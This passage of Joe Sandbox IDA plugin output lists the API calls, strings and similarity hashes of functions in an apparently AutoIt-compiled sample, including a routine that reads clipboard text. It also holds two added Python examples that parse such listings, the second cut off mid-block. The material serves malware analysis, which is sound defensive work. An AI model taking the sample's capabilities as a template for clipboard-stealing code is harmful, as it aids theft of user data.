                                                                                                                                    • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-3360698832
• Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
• Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
• Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
• Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
APIs
• GetSysColor.USER32(0000000E), ref: 00433D81
• SetTextColor.GDI32(?,00000000), ref: 00433D89
• GetSysColor.USER32(00000012), ref: 00433DA3
• SetTextColor.GDI32(?,?), ref: 00433DAB
• GetSysColorBrush.USER32(0000000F), ref: 00433DBF
• GetSysColor.USER32(0000000F), ref: 00433DCB
• CreateSolidBrush.GDI32(?), ref: 00433DD4
• GetSysColor.USER32(00000011), ref: 00433DEB
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
• SelectObject.GDI32(?,00000000), ref: 00433E0D
• SetBkColor.GDI32(?,?), ref: 00433E19
• SelectObject.GDI32(?,?), ref: 00433E29
• InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
• GetWindowLongW.USER32 ref: 00433E8A
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
• GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
• InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
• DrawFocusRect.USER32(?,?), ref: 00433F1F
• GetSysColor.USER32(00000011), ref: 00433F2E
• SetTextColor.GDI32(?,00000000), ref: 00433F36
• DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
• SelectObject.GDI32(?,?), ref: 00433F63
• DeleteObject.GDI32(?), ref: 00433F70
• SelectObject.GDI32(?,?), ref: 00433F78
• DeleteObject.GDI32(00000000), ref: 00433F7B
• SetTextColor.GDI32(?,?), ref: 00433F83
• SetBkColor.GDI32(?,?), ref: 00433F8F
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1582027408-0
• Opcode ID: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
• Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
• Opcode Fuzzy Hash: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
• Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
APIs
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
• String ID: HH
• API String ID: 589737431-2761332787
• Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
• Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
• Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
• Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
APIs
• GetCursorPos.USER32(?), ref: 00456692
• GetDesktopWindow.USER32 ref: 004566AA
• GetWindowRect.USER32(00000000), ref: 004566B1
• GetWindowLongW.USER32(?,000000F0), ref: 0045670D
• GetWindowLongW.USER32(?,000000F0), ref: 00456720
• DestroyWindow.USER32(?), ref: 00456731
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
• SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
• IsWindowVisible.USER32(?), ref: 00456812
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
• GetWindowRect.USER32(?,?), ref: 0045685C
• MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
• GetMonitorInfoW.USER32 ref: 00456894
• CopyRect.USER32(?,?), ref: 004568A8
• SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
• String ID: ($,$tooltips_class32
• API String ID: 541082891-3320066284
• Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
• Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
• Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
• Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
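The blocks above are the sandbox's per-function listing: an "APIs" call list with call-site addresses, the memory dump the function was lifted from, and "Similarity" fields (API ID, String ID, Opcode ID, fuzzy hashes) that let functions be matched across reports. The parser below is an added example, not Joe Sandbox code: it turns such blocks into records, splits the '$'-joined String ID field back into individual strings, decodes the first argument of GetClipboardData in the clipboard function (0xD is CF_UNICODETEXT, 1 is CF_TEXT, the standard Win32 values), and tags records whose call list contains OpenClipboard plus GetClipboardData or whose strings are AutoIt3 preprocessor directives (the strings in the __wcsnicmp block are exactly those, which is what an AutoIt-compiled executable carries). The sample text is a constructed, trimmed excerpt copied from the listing; the regular expressions, the tag names and the stripping of the "Download File" link text that the HTML export fuses onto .sdmp names are my assumptions about the export format.

```python
"""Parse Joe Sandbox per-function listings into records and tag notable behaviour.
Added example, not Joe Sandbox code; the format assumptions are noted inline."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed, trimmed excerpt of the listing above: a record cut off mid-block, the
# clipboard-reading function and the block whose strings are AutoIt3 directives.
SAMPLE = """\
  • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
• Opcode ID: 63a2be33accb074b4178bb2d7a96f271ea41f5903b36f57aa3a0bb7ff7b8698e
APIs
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GetClipboardData.USER32(00000001), ref: 0046C6DD
Memory Dump Source
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID: HH
• Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
APIs
Similarity
• API ID: __wcsnicmp
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
• Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RESIDUE = "Download File"  # link text the HTML export fuses onto .sdmp file names (assumption)
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s?(?P<val>.*)$")

# args are the raw listed arguments ("?" where unresolved); ref is the call-site address
ApiCall = namedtuple("ApiCall", "name module args ref subcall")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    associated: list = field(default_factory=list)  # related memory dumps
    meta: dict = field(default_factory=dict)        # Source File, API ID, Opcode ID, ...

def parse(text):
    """Split a listing into FunctionRecords; each 'APIs' header opens a new one."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None:  # excerpt starts mid-record, as the page does
            cur = FunctionRecord()
            records.append(cur)
        m = API_RE.match(line)
        if m and section in (None, "APIs"):
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None))
        elif section == "Strings":
            cur.strings.append(line.lstrip("• "))
        elif (kv := KV_RE.match(line)):
            key, val = kv["key"], kv["val"].strip()
            if val.endswith(RESIDUE):
                val = val[: -len(RESIDUE)].strip()
            if key == "Associated":
                cur.associated.append(val)
            else:
                cur.meta[key] = val
    return records

def string_ids(rec):
    """The '$'-joined String ID field split back into individual strings."""
    return [s for s in rec.meta.get("String ID", "").split("$") if s]

CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}  # standard Win32 values
AUTOIT_DIRECTIVES = {"#NoAutoIt3Execute", "#OnAutoItStartRegister", "#requireadmin", "#notrayicon"}

def clipboard_formats(rec):
    """Formats requested via GetClipboardData, decoded from its first argument."""
    fmts = []
    for c in rec.apis:
        if c.name == "GetClipboardData" and c.args and c.args[0] != "?":
            n = int(c.args[0], 16)
            fmts.append(CLIPBOARD_FORMATS.get(n, f"0x{n:X}"))
    return fmts

def classify(rec):
    """Tags assigned by this example; the names are mine, not sandbox signature names."""
    names = {c.name for c in rec.apis}
    tags = []
    if {"OpenClipboard", "GetClipboardData"} <= names:
        tags.append("reads clipboard: " + ", ".join(clipboard_formats(rec)))
    if AUTOIT_DIRECTIVES & set(string_ids(rec)):
        tags.append("AutoIt3 preprocessor directives")
    return tags

if __name__ == "__main__":
    for rec in parse(SAMPLE):
        print(rec.meta.get("Opcode ID", "?")[:12], len(rec.apis), "calls", classify(rec))
```

Run it over the whole report text rather than the excerpt to get one record per listed function; the meta dict keeps Opcode ID and the fuzzy hashes, so records from two reports can be joined on those fields to see which functions the samples share. The tags are deliberately narrow: an API set is only evidence of capability, and the format decode relies on the sandbox having resolved the argument, which is why "?" arguments are skipped.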
APIs
• _wcslen.LIBCMT ref: 00454DCF
• _wcslen.LIBCMT ref: 00454DE2
• __wcsicoll.LIBCMT ref: 00454DEF
• _wcslen.LIBCMT ref: 00454E04
• __wcsicoll.LIBCMT ref: 00454E11
• _wcslen.LIBCMT ref: 00454E24
• __wcsicoll.LIBCMT ref: 00454E31
  • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
• LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
• LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
• FreeLibrary.KERNEL32(00000000), ref: 00454F37
• ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
• DestroyIcon.USER32(?), ref: 00454FA2
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 2511167534-1154884017
• Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                    • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                                    • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                    • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
• _wcslen.LIBCMT ref: 00436B79
• _wcscpy.LIBCMT ref: 00436B9F
• _wcscat.LIBCMT ref: 00436BC0
• VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
• _wcscat.LIBCMT ref: 00436C2A
• _wcscat.LIBCMT ref: 00436C31
• __wcsicoll.LIBCMT ref: 00436C4B
• _wcsncpy.LIBCMT ref: 00436C62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
• Opcode ID: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
• Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
• Opcode Fuzzy Hash: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
• Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
APIs
  • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
• _fseek.LIBCMT ref: 004527FC
• __wsplitpath.LIBCMT ref: 0045285C
• _wcscpy.LIBCMT ref: 00452871
• _wcscat.LIBCMT ref: 00452886
• __wsplitpath.LIBCMT ref: 004528B0
• _wcscat.LIBCMT ref: 004528C8
• _wcscat.LIBCMT ref: 004528DD
• __fread_nolock.LIBCMT ref: 00452914
• __fread_nolock.LIBCMT ref: 00452925
• __fread_nolock.LIBCMT ref: 00452944
• __fread_nolock.LIBCMT ref: 00452955
• __fread_nolock.LIBCMT ref: 00452976
• __fread_nolock.LIBCMT ref: 00452987
• __fread_nolock.LIBCMT ref: 00452998
• __fread_nolock.LIBCMT ref: 004529A9
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
• __fread_nolock.LIBCMT ref: 00452A39
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
• Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
• Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
• Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
• Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
• Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
• Opcode Fuzzy Hash: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
• Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetWindowRect.USER32(?,?), ref: 004701EA
• GetClientRect.USER32(?,?), ref: 004701FA
• GetSystemMetrics.USER32(00000007), ref: 00470202
• GetSystemMetrics.USER32(00000008), ref: 00470216
• GetSystemMetrics.USER32(00000004), ref: 00470238
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
• GetSystemMetrics.USER32(00000007), ref: 00470273
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
• GetSystemMetrics.USER32(00000008), ref: 004702A8
• GetSystemMetrics.USER32(00000004), ref: 004702CF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
• AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
• GetClientRect.USER32(?,?), ref: 00470371
• GetStockObject.GDI32(00000011), ref: 00470391
• SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
• SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: AutoIt v3 GUI
• API String ID: 867697134-248962490
• Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
• Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
• Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
• Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
APIs
• SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window
• String ID: 0
• API String ID: 2353593579-4108050209
• Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
• Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
• Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
• Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
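Each of these entries is machine output from the Joe Sandbox IDA plugin: the function's resolved API calls with call-site addresses, the memory dump it was lifted from, and a Similarity block whose API ID, String ID and fuzzy hashes are the fields an analyst pivots on between reports. The Python below is an added example, not Joe Sandbox's or the sample's own code, that parses the plain-text form of these entries as they appear on this page into records and indexes them by field. Its input is constructed from two of the entries above (the second shortened to a few API lines); it assumes only the layout visible here (section labels, `• Key: value` lines, a `$`-joined String ID, each entry closed by its Instruction Fuzzy Hash line) and makes no assumption about how any ID or hash is computed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: two function entries from this page in its plain-text form,
# the second shortened to a few API lines. Not a complete report.
SAMPLE = """\
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
• _wcslen.LIBCMT ref: 00436B79
• VerQueryValueW.VERSION(00000000,\\VarFileInfo\\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\\$\\VarFileInfo\\Translation
• API String ID: 1503153545-1459072770
• Opcode ID: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
• Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
• Opcode Fuzzy Hash: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
• Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetWindowRect.USER32(?,?), ref: 004701EA
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
• SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: AutoIt v3 GUI
• API String ID: 867697134-248962490
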